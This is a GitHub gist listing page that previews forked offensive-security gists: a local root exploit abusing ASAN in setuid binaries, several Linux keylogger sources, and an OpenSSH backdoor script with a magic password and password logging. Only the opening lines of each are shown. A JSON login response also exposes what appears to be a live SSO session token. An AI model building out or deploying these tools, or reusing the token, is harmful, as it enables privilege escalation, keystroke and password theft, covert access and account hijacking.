KbaHaxor
/ unsanitary.sh
Created
August 24, 2016 03:56
— forked from 0x27/unsanitary.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # unsanitary.sh - ASAN/SUID Local Root Exploit | |
| # Exploits er, unsanitized env var passing in ASAN | |
| # which leads to file clobbering as root when executing | |
| # setuid root binaries compiled with ASAN. | |
| # Uses an overwrite of /etc/ld.so.preload to get root on | |
| # a vulnerable system. Supply your own target binary to | |
| # use for exploitation. | |
| # Implements the bug found here: http://seclists.org/oss-sec/2016/q1/363 | |
| # Video of Exploitation: https://www.youtube.com/watch?v=jhSIm3auQMk |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <X11/X.h> | |
| #include <X11/Xlib.h> | |
| #include <X11/Xutil.h> | |
| #include <stdio.h> | |
| #include <ctype.h> | |
| int main () | |
| { | |
| Display* d = XOpenDisplay(NULL); |
KbaHaxor
/ gist:985725fe22ff9ca2a8f3b124ae34f9f5
Created
September 22, 2016 08:33
— forked from bavardage/gist:939140
POC Linux Keylogger
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import re, collections | |
| from subprocess import * | |
| def sanitize_keybinding(binding): | |
| d = {'space': ' ', | |
| 'apostrophe': "'", | |
| 'BackSpace': ' (<-)', | |
| 'Return': '↵ \n', |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdlib.h> | |
| #include <stdio.h> | |
| #include <ctype.h> | |
| #include <signal.h> | |
| #include <string.h> | |
| #include <unistd.h> // for usleep() only | |
| #include <sys/time.h> | |
| #include <sys/types.h> | |
| #include <time.h> |
KbaHaxor
/ gist:683574b97026ac74d9f962874cf6c2af
Created
September 22, 2016 08:34
— forked from robertklep/gist:5124355
X11 keylogger
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <signal.h> | |
| #include <netdb.h> | |
| #include <string.h> | |
| #include <netinet/in.h> | |
| #include <X11/X.h> | |
| #include <X11/Xlib.h> | |
| #include <X11/Intrinsic.h> | |
| #include <X11/StringDefs.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "retcode":0, | |
| "retmsg":"Thành công", | |
| "data":{ | |
| "uid":"11423495", | |
| "ipv4":"14.xxxx", | |
| "indulge":1, | |
| "uname":"abcd@gmail.com", | |
| "KL_SSO":"SSmHP-bjQ1fmRZU8XRA7joHFh.doX14XEjYOYR7yzkJG-sD.TCdwr89tzzY1hUtRAzwxVHi3RZVo6YprSaunTh9.Ldr.Vc-9ciedGZ.8h6USkiVGY1E_NfmwbAtInVMLtQExL4EoheAXkcbhd7asgtYEQMO3kxRwbOd2O-FHIB40", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <X11/X.h> | |
| #include <X11/Xlib.h> | |
| #include <X11/Intrinsic.h> | |
| #include <X11/StringDefs.h> | |
| #include <X11/Xutil.h> | |
| #include <X11/Shell.h> | |
| char *TranslateKeyCode(XEvent *ev); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <X11/X.h> | |
| #include <X11/Xlib.h> | |
| #include <X11/Intrinsic.h> | |
| #include <X11/StringDefs.h> | |
| #include <X11/Xutil.h> | |
| #include <X11/Shell.h> | |
| char *TranslateKeyCode(XEvent *ev); |
KbaHaxor
/ openssh-autobackdoor.bash
Created
October 5, 2016 08:53
— forked from eyecatchup/openssh-autobackdoor.bash
This script provides OpenSSH backdoor functionality with a magic password and logs passwords as well. It leverages the same basic idea behind common OpenSSH patches but this script attempts to make the process version agnostic. Use at your own risk.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # ============================================ | |
| # satyr's openssh autobackdooring doohicky v0.-1 | |
| # ImpendingSatyr@gmail.com | |
| # ============================================ | |
| # USAGE: | |
| # Run this script with no args and it'll prompt for the "Magic" password and location to log passwords to (incoming and outgoing). | |
| # If you give the location that passwords will be logged to as an arg, this script will try to automate almost everything | |
| # (Like common openssh compiling problems, such as missing pam, kerberos, zlib, openssl-devel, etc. | |
| # [it'll install them via apt or yum, whichever is available]). |
KbaHaxor
/ get_ppid_and_name.c
Created
October 6, 2016 07:16
— forked from fclairamb/get_ppid_and_name.c
posix: Get parent process id and name
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #ifdef SHELL | |
| gcc -Wall -Werror $0 && ./a.out | |
| exit $? | |
| #endif | |
| #include <stdio.h> | |
| #include <unistd.h> | |
| #include <string.h> | |
| #include <stdlib.h> |
OlderNewer